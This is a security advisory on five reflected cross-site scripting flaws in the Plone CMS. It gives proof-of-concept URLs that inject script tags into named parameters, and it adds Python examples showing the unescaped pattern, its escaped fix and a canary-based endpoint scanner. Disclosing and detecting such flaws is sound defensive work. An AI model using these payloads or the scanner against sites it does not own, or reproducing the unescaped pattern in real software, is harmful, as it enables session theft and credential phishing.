Multiple cross-site scripting vulnerabilities in Plone

SEC Consult Vulnerability Lab Security Advisory < 20110606-0 >

=======================================================================

title: Multiple cross-site scripting vulnerabilities

product: Plone

vulnerable version: 4.0.6.1/4.1rc3 and earlier versions (Plone 3 & 2.5)

fixed version: Plone 4.0.7 / Hotfix 20110531 (for older releases)

impact: medium

homepage: plone.org

found: 2011-03-23

CVE: CVE-2011-1948

by: S. Streichsbier / SEC Consult Vulnerability Lab

www.sec-consult.com

=======================================================================

 

Vendor description:

-------------------

Plone is an open source Content Management System (CMS) built on top of Zope

and CMF.

 

"A powerful, flexible Content Management Solution that is easy to install, use

and extend.

Plone lets non-technical people create and maintain information for a public

website or an intranet using only a web browser. Plone is easy to understand

and use - allowing users to be productive in just half an hour - yet offers a

wealth of community-developed add-ons and extensibility to keep meeting your

needs for years to come.

 

Blending the creativity and speed of open source with a technologically

advanced Python back-end, Plone offers superior security without sacrificing

power or extensibility."

 

source: plone.org/about/

 

 

 

Vulnerability overview/description:

-----------------------------------

Plone uses skin layers for extending Plone themes. The "portal_skins" tool

allows managing skin layers, which may consist of DTML methods, images, Python

scripts, etc. Several Python scripts shipped in the skin layers of the default

installation of the tested Plone version can be called directly via HTTP and

reflect user-supplied request parameters into the response without sufficient

validation or output encoding, which results in reflected cross-site scripting.

 

An unauthenticated attacker can exploit this by luring a victim to a crafted

URL, in order to run script code in the context of the affected website, e.g.

to inject a fake re-login form (relogin trojan horse) that harvests credentials

or to steal session cookies of a logged-in user.
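The unsafe pattern and its fix, as an added illustration (this is not Plone's
own skin script code and does not claim to be the vendor's patch): a stand-in
for a URL-callable script that builds markup from the "input_list" request
parameter, once echoing the value verbatim and once HTML-escaping it on output.
The function names and the query string are assumptions made for the example.

```python
import html
import urllib.parse
from urllib.parse import parse_qs

# Constructed stand-in for a through-the-web callable skin script that renders
# a request parameter as a list. It only reproduces the pattern the advisory
# describes (reflecting a parameter into HTML); it is not createMultiColumnList.py.
def build_list_vulnerable(request_qs: str) -> str:
    items = parse_qs(request_qs).get("input_list", [])
    # The decoded parameter value is concatenated into the response unchanged,
    # so "<script>..." in the URL becomes a live script tag in the page.
    return "<ul>" + "".join(f"<li>{item}</li>" for item in items) + "</ul>"


def build_list_fixed(request_qs: str) -> str:
    items = parse_qs(request_qs).get("input_list", [])
    # Escape on output: '<', '>', '&' and quotes become entities, so the browser
    # shows the payload as text instead of executing it. Escaping at the point
    # of output is what makes this robust regardless of where the value came from.
    return "<ul>" + "".join(
        f"<li>{html.escape(item, quote=True)}</li>" for item in items
    ) + "</ul>"


# The same payload the proof of concept uses, URL-encoded as in the PoC links.
PAYLOAD = "<script>alert(1)</script>"
POC_QS = "input_list=" + urllib.parse.quote(PAYLOAD)


if __name__ == "__main__":
    print("vulnerable:", build_list_vulnerable(POC_QS))
    print("fixed:     ", build_list_fixed(POC_QS))
```

Running it shows the script tag surviving intact in the first output and
appearing as `&lt;script&gt;alert(1)&lt;/script&gt;` in the second.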

 

 

 

Proof of concept:

-----------------

1) The parameter "input_list" of the createMultiColumnList.py file included in

the plone_scripts package is not properly validated and is prone to reflected

cross-site scripting.

 

http:// $host/Plone/createMultiColumnList?input_list=%3Cscript%3Ealert(1)%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E

 

 

2) The parameter "randomstring" of the pwreset_constructURL.py file included

in the PasswordReset package is not properly validated and is prone to

reflected cross-site scripting.

 

http:// $host/Plone/pwreset_constructURL?randomstring=%3Cscript%3Ealert(1)%3C/script%3E

 

 

3) The parameter "qs" of the create_query_string.py file included in the

plone_scripts package is not properly validated and is prone to reflected

cross-site scripting.

 

http:// $host/Plone/create_query_string?qs=%3Cscript%3Ealert(1)%3C/script%3E

 

 

4) The parameter "default_tab" of the selectedTabs.py file included in the

plone_deprecated package is not properly validated and is prone to reflected

cross-site scripting.

 

http:// $host/Plone/selectedTabs?default_tab=%3Cscript%3Ealert(1)%3C/script%3E

 

 

5) The parameter "input_id" of the getPopupScript.py file included in the

plone_scripts package is not properly validated and is prone to reflected

cross-site scripting.

 

http:// $host/Plone/getPopupScript?input_id=%3Cscript%3Ealert(1)%3C/script%3E
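A check for the five endpoints above, added here as an example (not part of the
original advisory or of Plone): it requests each script with a unique, harmless
canary tag in the named parameter and classifies the response as reflected
unescaped (exploitable), reflected escaped (fixed) or not reflected. A canary
is used instead of "<script>alert(1)</script>" because a real page may contain
script tags of its own and would produce false positives. The base URL, the
canary string and the function names are assumptions of this example; the
endpoint and parameter names are taken from the proof of concept.

```python
import html
import urllib.error
import urllib.parse
import urllib.request

# Script name / parameter pairs from the proof-of-concept section above.
AFFECTED = [
    ("createMultiColumnList", "input_list"),
    ("pwreset_constructURL", "randomstring"),
    ("create_query_string", "qs"),
    ("selectedTabs", "default_tab"),
    ("getPopupScript", "input_id"),
]

# A bogus tag that no legitimate Plone page contains (assumed canary value).
CANARY = '<xsscanary a="1">'


def classify(body: str, canary: str = CANARY) -> str:
    """Return how a response body treats the injected canary."""
    if canary in body:
        # Verbatim echo of markup: the browser would parse it as a tag.
        return "reflected-unescaped"
    if html.escape(canary, quote=True) in body:
        # Entity-encoded echo: rendered as text, not exploitable.
        return "reflected-escaped"
    return "not-reflected"


def build_probe_url(base_url: str, script: str, param: str, canary: str = CANARY) -> str:
    """Compose http://$host/Plone/<script>?<param>=<canary> with proper encoding."""
    return f"{base_url.rstrip('/')}/{script}?{urllib.parse.urlencode({param: canary})}"


def fetch_body(url: str, timeout: float = 10.0) -> str:
    # Error pages (e.g. 404 when a skin layer has been disabled) still carry a
    # body worth classifying, so HTTP errors are read rather than raised.
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            charset = resp.headers.get_content_charset() or "utf-8"
            return resp.read().decode(charset, "replace")
    except urllib.error.HTTPError as err:
        return err.read().decode("utf-8", "replace")


def probe(base_url: str) -> dict:
    """Probe every affected script under base_url (e.g. http://host/Plone)."""
    return {
        script: classify(fetch_body(build_probe_url(base_url, script, param)))
        for script, param in AFFECTED
    }


if __name__ == "__main__":
    import sys
    # Usage: python probe.py http://$host/Plone  (only against systems you own)
    for script, verdict in probe(sys.argv[1]).items():
        print(f"{script:24s} {verdict}")
```

Only a "reflected-unescaped" verdict is a finding; "reflected-escaped" is the
expected result on 4.0.7 or a hotfixed site. The check looks at the body only,
so confirm the response is served as text/html before treating a hit as
exploitable in the browser.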

 

 

 

 

Vulnerable / tested versions:

-----------------------------

The vulnerabilities were verified to exist in Plone version 4.0.4, which

was the most recent version at the time of discovery.

 

The following newer versions are vulnerable too:

* v4.0.5

* v4.0.6 and v4.0.6.1

* v4.1rc3

 

 

SEC Consult did not test earlier versions, but the vendor states that

Plone 3 and 2.5 are also affected.

 

 

Fixed version:

--------------

* 4.0.7 and above

 

 

Vendor contact timeline:

------------------------

2011-03-28: Vendor contacted through security@plone.org

2011-03-29: Vendor replies; advisory draft sent to vendor

2011-03-30: Vendor asks questions regarding the issue

2011-03-30: Attack vectors described to vendor

2011-04-11: Status update requested; vendor replies

2011-04-21: Vendor: no exact fix date yet, a hotfix exists but still needs testing

2011-06-02: Vendor informs SEC Consult of the hotfix release

2011-06-06: SEC Consult publishes advisory

 

 

Solution:

---------

Upgrade to version 4.0.7 or install the following hotfix for older releases:

plone.org/products/plone-hotfix/releases/20110531

 

 

 

Workaround:

-----------

Affected skin layers can be disabled through the web in portal_skins ->

properties by removing them from the active skin path. Note that plone_scripts

and PasswordReset provide functionality the site relies on (the password reset

flow in particular), so removing whole layers may break the site; the hotfix

or the upgrade is the preferable remedy.

 

 

 

Advisory URL:

-------------

www.sec-consult.com/en/advisories.html

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Unternehmensberatung GmbH

 

Office Vienna

Mooslackengasse 17

A-1190 Vienna

Austria

 

Tel.: +43 / 1 / 890 30 43 - 0

Fax.: +43 / 1 / 890 30 43 - 25

Mail: research at sec-consult dot com

www.sec-consult.com

 

EOF S. Streichsbier, J. Greil / @2011